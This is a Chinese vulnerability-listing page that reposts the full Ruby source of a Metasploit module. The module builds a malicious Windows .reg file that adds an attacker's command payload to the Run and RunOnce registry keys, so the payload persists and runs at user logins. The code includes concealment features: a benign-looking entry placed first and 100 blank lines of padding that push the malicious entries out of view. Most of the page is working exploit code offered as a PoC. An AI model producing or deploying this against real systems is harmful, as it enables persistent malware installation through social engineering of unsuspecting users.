Malicious Windows Registration Entries (reg) File

漏洞信息

漏洞名称: Malicious Windows Registration Entries (.reg) File

漏洞类型: 命令执行

漏洞等级: 高危

漏洞描述: 该漏洞利用Windows注册表项文件(.reg)的特性,通过创建恶意的注册表项文件,实现在用户登录时自动执行恶意载荷。具体来说,攻击者可以构造一个.reg文件,当用户打开该文件并确认注册表更改时,恶意载荷会被添加到Windows注册表的Run或RunOnce键中。如果用户具有提升的权限,恶意载荷将在任何用户登录时执行。该漏洞的技术根源在于Windows注册表项文件的设计允许通过用户交互执行任意命令,而缺乏足够的警告和安全验证。这种漏洞可能导致远程代码执行,尤其是在用户具有管理员权限的情况下,攻击者可以完全控制系统。由于需要用户交互(即打开.reg文件并确认更改),该漏洞的利用需要一定的社会工程学技巧。然而,一旦成功利用,攻击者可以在受害者的系统上持久化恶意代码,甚至在系统重启后仍然保持访问权限。

产品厂商: Microsoft

产品名称: Windows

影响版本: Microsoft Windows 2000 or newer

来源: https://github.com/rapid7/metasploit-framework/blob/afeded56aabc0859e447ac53db2b8386e108a897/modules%2Fexploits%2Fwindows%2Ffileformat%2Fwindows_registration_entries.rb

类型: rapid7/metasploit-framework:github commit

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Malicious Windows Registration Entries (.reg) File',
        'Description' => %q{
          This module creates a Windows Registration Entries (.reg) file which
          adds the specified payload to the Windows Registry. The payload runs
          upon Windows login for the current user. If the user has elevated
          privileges when opening the file, the payload will run upon login
          when any user logs in.

          The user will receive a warning prompt to confirm Registry changes
          when opening the file.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'bcoles'
        ],
        'References' => [
          ['URL', 'https://support.microsoft.com/en-us/topic/how-to-add-modify-or-delete-registry-subkeys-and-values-by-using-a-reg-file-9c7f37cf-a5e9-e1cd-c4fa-2a26218a1a23'],
          ['URL', 'https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys'],
          ['URL', 'https://learn.microsoft.com/en-us/windows-hardware/drivers/install/runonce-registry-key'],
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
        ],
        'Arch' => [ARCH_CMD],
        'Platform' => 'win',
        'Payload' => {
          'Space' => 244, # 255 minus "cmd.exe /c " prefix length
          'BadChars' => "\x00",
          'DisableNops' => true
        },
        'Targets' => [
          [
            'Microsoft Windows 2000 or newer',
            {
              'RegistryEditorVersion' => '5.00'
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '1995-08-24',
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'DisablePayloadHandler' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
          'SideEffects' => [SCREEN_EFFECTS]
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [true, 'The registration entries file name.', 'msf.reg']),
      ]
    )

    register_advanced_options([
      OptBool.new('AddToCurrentUserWindowsCurrentVersionRun', [false, 'Add payload to login for current user.', true]),
      OptBool.new('AddToCurrentUserWindowsCurrentVersionRunOnce', [false, 'Same as AddToCurrentUserWindowsCurrentVersionRun, but the registry key is deleted after use.', false]),
      OptBool.new('AddToLocalMachineWindowsCurrentVersionRun', [false, 'Add payload to login for all users. The user will see a vague error message if they do not have the necessary permissions, but all other entries are still added successfully.', true]),
      OptBool.new('AddToLocalMachineWindowsCurrentVersionRunOnce', [false, 'Same as AddToLocalMachineWindowsCurrentVersionRun, but the registry key is deleted after use.', false]),
      OptBool.new('PrependBenignEntry', [false, 'Prepend a benign registry entry at the start of the file.', true]),
      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the first malicious registry entry.', 100]),
    ])
  end

  # Create a registry entry in Windows .reg file format
  def registry_entry(path, type, key, value)
    # https://learn.microsoft.com/en-us/windows/win32/sysinfo/registry-element-size-limits
    raise "Registry key '#{type}' length (#{key.length}) is too long (max 255)" if key.length > 255
    raise "Registry value '#{value}' length (#{value.length}) is too long (max 16,300)" if value.length > 16_300

    # https://learn.microsoft.com/en-us/windows/win32/sysinfo/registry-value-types
    raise "Unsupported key type '#{type}', excepted REG_SZ" unless type == 'REG_SZ'

    escaped_value = value.gsub('\\', '\\\\\\').gsub('"', '\\\"')
    reg_entry = "[#{path}]\r\n"
    reg_entry << "\"#{key}\"=\"#{escaped_value}\"\r\n"
    vprint_status("Created registry entry:\n#{reg_entry}")
    reg_entry
  end

  # Format commands for use with the appropriate interpreter
  def format_commands(command_string)
    # Strip preceding whitespace as this would prevent execution
    raw_cmd = command_string.to_s.gsub(/^\s*/, '')

    # If the payload contains " & " we presume it is a command string.
    #
    # TODO: Change this once Metasploit is able to inform a module that
    #       the specified ARCH_CMD payload is a string of commands
    #       (not a single command).
    if raw_cmd.include?(' & ')
      cmd = "cmd.exe /c #{raw_cmd}"
    else
      cmd = raw_cmd
    end

    raise "Command length (#{cmd.length}) is too long (max 255)" if cmd.length > 255

    cmd
  end

  def exploit
    # File structure:
    #   File header string
    #   Benign registry entry (optional)
    #   Visual whitespace padding (optional)
    #   HKCU entries
    #   HKLM entries (optional)
    reg = "Windows Registry Editor Version #{target['RegistryEditorVersion']}\r\n"
    reg << "\r\n"

    reg_entries = []

    if datastore['PrependBenignEntry']
      path = "HKEY_CURRENT_USER\\Software\\#{rand_text_alphanumeric(10..16)}"
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        rand_text_alphanumeric(10..16)
      )
      reg_entries << path + '\\' + key
    end

    reg << "\r\n" * datastore['PrependNewLines']

    if datastore['AddToCurrentUserWindowsCurrentVersionRun']
      path = 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    if datastore['AddToCurrentUserWindowsCurrentVersionRunOnce']
      path = 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    if datastore['AddToLocalMachineWindowsCurrentVersionRun']
      path = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    if datastore['AddToLocalMachineWindowsCurrentVersionRunOnce']
      path = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    unless reg_entries
      fail_with(Failure::BadConfig, 'No registry entries were created! Check module advanced options.')
    end

    file_create(reg)

    print_status("This file will create the following registry keys:\n#{reg_entries.join("\n")}")
  rescue StandardError => e
    print_error(e.message)
  end
end


Github Poc
#命令执行 #rapid7/metasploit-framework:github commit
Malicious Windows Registration Entries (reg) File
http://example.com/2025/07/24/github_3566269007/
作者
lianccc
发布于
2025年7月24日
许可协议